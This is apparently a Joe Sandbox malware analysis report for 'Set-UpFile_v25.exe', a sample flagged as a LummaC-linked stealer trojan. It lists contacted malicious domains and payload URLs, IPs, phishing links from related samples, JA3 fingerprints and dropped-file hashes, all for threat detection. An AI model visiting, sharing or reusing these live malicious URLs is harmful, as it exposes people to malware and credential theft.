                                            https://cegu.shop/Set-UpFile_v25.exe, 00000000.00000002.1966453532.0000000003683000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://beattalkerz.cyou/FSet-UpFile_v25.exe, 00000000.00000003.1958807611.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1920128987.00000000008AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://dfgh.online/invoker.php?compName=powershell.exe, 00000004.00000002.1971280536.0000000004761000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Set-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Set-UpFile_v25.exe, 00000000.00000003.1793274288.00000000036C9000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1793129972.0000000003713000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://beattalkerz.cyou/apilaSet-UpFile_v25.exe, 00000000.00000003.1876965792.000000000367F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://ocsp.starfieldtech.com/0DSet-UpFile_v25.exefalse
                                                      		high
                                                      https://klipvumisui.shop/int_clp_sha.txt%Set-UpFile_v25.exe, 00000000.00000003.1958807611.0000000000845000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://crl.thawte.com/ThawteTimestampingCA.crl0Set-UpFile_v25.exefalse
                                                        		high
                                                        https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.1971280536.0000000004761000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://x1.c.lencr.org/0Set-UpFile_v25.exe, 00000000.00000003.1816330142.00000000036AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://x1.i.lencr.org/0Set-UpFile_v25.exe, 00000000.00000003.1816330142.00000000036AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallSet-UpFile_v25.exe, 00000000.00000003.1793274288.00000000036A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSet-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://contoso.com/powershell.exe, 00000004.00000002.1978484027.00000000057C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1978484027.00000000057C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://beattalkerz.cyorTSet-UpFile_v25.exe, 00000000.00000003.1958807611.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000002.1962621793.0000000000807000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://beattalkerz.cyou/api0Set-UpFile_v25.exe, 00000000.00000003.1907601851.000000000367F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://dfgh.onlinepowershell.exe, 00000004.00000002.1971280536.00000000048B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://klipvumisui.shop/int_clp_sha.txtf1R=Set-UpFile_v25.exe, 00000000.00000003.1958807611.00000000008AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://beattalkerz.cyou/apibuSet-UpFile_v25.exe, 00000000.00000003.1958807611.0000000000845000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://dfgh.online/invoker.php?compname=powershell.exe, 00000004.00000002.1970487568.0000000000760000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://crl.starfieldtech.com/repository/sfsroot.crl0PSet-UpFile_v25.exefalse
                                                                            		high
                                                                            https://support.mozilla.org/products/firefoxgro.allSet-UpFile_v25.exe, 00000000.00000003.1817560685.000000000379C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1971280536.0000000004761000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://beattalkerz.cyou/4ISet-UpFile_v25.exe, 00000000.00000002.1962621793.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1958807611.0000000000816000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://klipvumisui.shop/int_clp_sha.txtSet-UpFile_v25.exe, 00000000.00000003.1958807611.00000000008AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.innosetup.com/Set-UpFile_v25.exefalse
                                                                                    		high
                                                                                    http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1978484027.00000000057C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoSet-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1971280536.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1981590560.0000000006D97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1971280536.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1981590560.0000000006D97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://go.micropowershell.exe, 00000004.00000002.1971280536.0000000004F58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://ocsp.thawte.com0Set-UpFile_v25.exefalse
                                                                                                		high
                                                                                                https://beattalkerz.cyou/apijhSet-UpFile_v25.exe, 00000000.00000003.1876965792.000000000367F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://contoso.com/Iconpowershell.exe, 00000004.00000002.1978484027.00000000057C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Set-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://klipvumisui.shop/int_clp_sha.txtcodedSet-UpFile_v25.exe, 00000000.00000003.1958807611.00000000008AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: malware
                                                                                                    		unknown
                                                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0Set-UpFile_v25.exe, 00000000.00000003.1816330142.00000000036AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://ocsp.rootca1.amazontrust.com0:Set-UpFile_v25.exe, 00000000.00000003.1816330142.00000000036AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://beattalkerz.cyou/apiF9Set-UpFile_v25.exe, 00000000.00000003.1958807611.0000000000845000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Set-UpFile_v25.exe, 00000000.00000003.1793274288.00000000036C9000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1793129972.0000000003713000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://beattalkerz.cyou/apizpSet-UpFile_v25.exe, 00000000.00000003.1877000966.000000000367A000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1877228216.000000000367A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://certificates.starfieldtech.com/repository/1604Set-UpFile_v25.exefalse
                                                                                                            		high
                                                                                                            https://www.ecosia.org/newtab/Set-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.symauth.com/cps0(Set-UpFile_v25.exefalse
                                                                                                                		high
                                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSet-UpFile_v25.exe, 00000000.00000003.1817560685.000000000379C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1971280536.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1981590560.0000000006D97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://klipvumisui.shop/Set-UpFile_v25.exe, 00000000.00000003.1958807611.00000000008B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://ac.ecosia.org/autocomplete?q=Set-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://beattalkerz.cyou/api9bf$Set-UpFile_v25.exe, 00000000.00000003.1908617857.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1907601851.000000000367F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://crl.starfieldtech.com/repository/0Set-UpFile_v25.exefalse
                                                                                                                          		high
                                                                                                                          http://crl.micropowershell.exe, 00000004.00000002.1969577811.00000000005D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://beattalkerz.cyou/apilMQ-$Set-UpFile_v25.exe, 00000000.00000002.1962621793.000000000081A000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1958807611.0000000000816000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://www.symauth.com/rpa00Set-UpFile_v25.exefalse
                                                                                                                              		high
                                                                                                                              https://dfgh.online/invoker.php?compName=user-PCxpowershell.exe, 00000004.00000002.1971280536.00000000048B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              		unknown
                                                                                                                              https://klipvumisui.shop/int_clp_sha.txt.3Set-UpFile_v25.exe, 00000000.00000003.1958807611.00000000008A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              		unknown
                                                                                                                              https://support.microsofSet-UpFile_v25.exe, 00000000.00000003.1793129972.0000000003715000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?Set-UpFile_v25.exe, 00000000.00000003.1816330142.00000000036AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://beattalkerz.cyou/apicSet-UpFile_v25.exe, 00000000.00000003.1790726742.0000000000845000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://beattalkerz.cyou/ySet-UpFile_v25.exe, 00000000.00000003.1877000966.000000000367A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://beattalkerz.cyou/fSet-UpFile_v25.exe, 00000000.00000003.1920128987.00000000008AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    http://www.remobjects.com/psSet-UpFile_v25.exefalse
                                                                                                                                      		high
                                                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSet-UpFile_v25.exe, 00000000.00000003.1793274288.00000000036A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://beattalkerz.cyou/Set-UpFile_v25.exe, 00000000.00000003.1907601851.000000000367B000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1804338671.0000000003679000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Set-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://beattalkerz.cyou/apisSet-UpFile_v25.exe, 00000000.00000003.1908617857.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1907601851.000000000367F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown

                                                                                                                                          World Map of Contacted IPs

                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs

                                                                                                                                          Public IPs

                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          185.161.251.21
                                                                                                                                          		cegu.shopUnited Kingdom
                                                                                                                                          		5089NTLGBfalse
                                                                                                                                          104.21.25.52
                                                                                                                                          		beattalkerz.cyouUnited States
                                                                                                                                          		13335CLOUDFLARENETUStrue

                                                                                                                                          General Information

                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                          Analysis ID:1585343
                                                                                                                                          Start date and time:2025-01-07 14:36:10 +01:00
                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 4m 28s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                          Number of analysed new started processes analysed:6
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                          Sample name:Set-UpFile_v25.exe
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@4/3@4/2
                                                                                                                                          EGA Information:
                                                                                                                                          • Successful, ratio: 50%
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                          • Number of executed functions: 16
                                                                                                                                          • Number of non-executed functions: 102
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                          • Stop behavior analysis, all processes terminated

                                                                                                                                          Warnings

                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                                          • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                                                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7596 because it is empty
                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                          • VT rate limit hit for: Set-UpFile_v25.exe

                                                                                                                                          Simulations

                                                                                                                                          Behavior and APIs

                                                                                                                                          TimeTypeDescription
                                                                                                                                          08:37:11API Interceptor10x Sleep call for process: Set-UpFile_v25.exe modified
                                                                                                                                          08:37:29API Interceptor7x Sleep call for process: powershell.exe modified

                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                          IPs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          185.161.251.21installer_1.05_36.8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                installer_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            104.21.25.52https://ness.wiktripfitness.com/ghjki9l-8765t4/3/er4t5y6u7jyhtgrfefrgthyjuyhtgdsarfedwsqaGet hashmaliciousUnknownBrowse

                                                                                                                                                              Domains

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              cegu.shopinstaller_1.05_36.8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.161.251.21
                                                                                                                                                              setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.161.251.21
                                                                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.161.251.21
                                                                                                                                                              installer_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                              • 185.161.251.21
                                                                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.161.251.21
                                                                                                                                                              Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.161.251.21
                                                                                                                                                              setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.161.251.21
                                                                                                                                                              'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.161.251.21
                                                                                                                                                              Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.161.251.21

                                                                                                                                                              ASNs

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              NTLGBSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.161.251.21
                                                                                                                                                              ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                              • 86.15.78.37
                                                                                                                                                              installer_1.05_36.8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.161.251.21
                                                                                                                                                              setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.161.251.21
                                                                                                                                                              https://pwv95gp5r-xn--r3h9jdud-xn----c1a2cj-xn----p1ai.translate.goog/sIQKSvTC/b8KvU/uoTt6?ZFhObGNpNXBiblp2YkhabGJXVnVkRUJ6YjNWMGFHVnliblJ5ZFhOMExtaHpZMjVwTG01bGRBPT06c1JsOUE+&_x_tr_sch=http&_x_tr_sl=hrLWHGLm&_x_tr_tl=bTtllyqlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 194.168.231.153
                                                                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.161.251.21
                                                                                                                                                              installer_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                              • 185.161.251.21
                                                                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.161.251.21
                                                                                                                                                              Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.161.251.21
                                                                                                                                                              CLOUDFLARENETUSSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 104.21.80.1
                                                                                                                                                              https://sos-ch-gva-2.exo.io/ready/seah/continue/complete-this-to-continue.htmlGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                              • 104.17.25.14
                                                                                                                                                              te13.exeGet hashmaliciousMetasploitBrowse
                                                                                                                                                              • 104.21.16.1
                                                                                                                                                              New order 2025.msgGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                              • 188.114.97.3
                                                                                                                                                              https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526Get hashmaliciousUnknownBrowse
                                                                                                                                                              • 104.17.25.14
                                                                                                                                                              https://email.garagesalefinder.com/c/eJyMU92OsjoUfZp6xwRaoO2FF-XPYT4VnXHQ8caUFivK3wcC-vYnzImc25OQlbXYa-_VJrtyniCCZ-ncwMg2KKWmPrvMCRWYGDSBBAkLnSGigttEUJpiLHRhzLK5JRHWEbE0wS1LkxzqmpnKRCMYcymIhUyJgKkr3nCVtjxPz1kp0-ZNVMUsn1_u9xogBmAAYDAMw5uqKpWnXLZp02cibUcfgEHNVcolgAEX-Q2goOUAeUsAbZ4B5Lma-bXS9YjEH8_jUsCMDFHdh-8V6xawX6ug4FFt3FtnCCFin8wJow2-DWulyU1_iVhfsfe8SpYtI8px_iiPHZXv8Movh2Cj-95Hcj0kV7urV6jyYvatjOfWaYZ2MRxIba6V3Jx55O3PcZmp2muai3lerzYyDgu0zWKnNlb-o7Sf7h6p70NxCvM23_41HfOEGuWGy9q9Hnlqfep7pO0Kfgrvm-rvV7zTOloie11_fJdEol2uDrr9xfmOPrr1Vr-IJWM_mXjnt9SPV5IVx53pOD-UrUI1qHwX-N2-JfHP9ThUm97B9z_nIOnjcuOGjloo51Iwxy6FckMA7bIrAPIMAG2RSYA8a5H18gTbKy737aLto4f-0GD3DaDdZgogj0WebZ6M8IN8ys_TY2eziPTBe70KjWKtt8gaxll5lpZ3gDzBtbpLNBsalBgGNrFuUoTHOC67JgfIGzehnVYBQAtjAC37l8GRuSOYU4G-pG2NgEYgk_ReFjwWsPli0J_MwSSdVxuc_v2bYU25I0BvMvvT0fBL_tdrsyktMAglv0Qs4o5D0vHD8ZIUFG4XwVMUFP0UQcef1jWBOkDea447drMR_PHuZATmTlIH0KIMQPP3-3_uWTOv0_JWvWU9L6semDpvmmpIeHn7fYv9HP4TAAD__7e2IkMGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 104.17.25.14
                                                                                                                                                              https://check.qlkwr.com/awjsx.captcha?u=d9b43caa-60bc-4673-bed6-4e9abc0c0678Get hashmaliciousUnknownBrowse
                                                                                                                                                              • 104.21.55.46
                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                                                              • 188.114.96.3
                                                                                                                                                              Crawl.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 1.1.1.1
                                                                                                                                                              ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 188.114.97.3

                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              a0e9f5d64349fb13191bc781f81f42e1Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.161.251.21
                                                                                                                                                              • 104.21.25.52
                                                                                                                                                              LVkAi4PBv6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 185.161.251.21
                                                                                                                                                              • 104.21.25.52
                                                                                                                                                              64pOGv7k4N.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.161.251.21
                                                                                                                                                              • 104.21.25.52
                                                                                                                                                              BnJxmraqlk.exeGet hashmaliciousLummaC, PrivateLoaderBrowse
                                                                                                                                                              • 185.161.251.21
                                                                                                                                                              • 104.21.25.52
                                                                                                                                                              NjFiIQNSid.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.161.251.21
                                                                                                                                                              • 104.21.25.52
                                                                                                                                                              H565rymIuO.docGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 185.161.251.21
                                                                                                                                                              • 104.21.25.52
                                                                                                                                                              w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 185.161.251.21
                                                                                                                                                              • 104.21.25.52
                                                                                                                                                              w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 185.161.251.21
                                                                                                                                                              • 104.21.25.52
                                                                                                                                                              sEG2xXpg0X.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 185.161.251.21
                                                                                                                                                              • 104.21.25.52
                                                                                                                                                              Drivespan.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 185.161.251.21
                                                                                                                                                              • 104.21.25.52

                                                                                                                                                              Dropped Files

                                                                                                                                                              No context

                                                                                                                                                              Created / dropped Files

                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):64
                                                                                                                                                              Entropy (8bit):1.1510207563435464
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:NlllulPki/llllZ:NllUcylll
                                                                                                                                                              MD5:D8D47FD6FA3E199E4AFF68B91F1D04A8
                                                                                                                                                              SHA1:788625E414B030E5174C5BE7262A4C93502C2C21
                                                                                                                                                              SHA-256:2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
                                                                                                                                                              SHA-512:5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                              Preview:@...e.................................^..............@..........

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1unjy0zf.ro1.ps1

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):60
                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hthjm0hp.xjb.psm1

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):60
                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
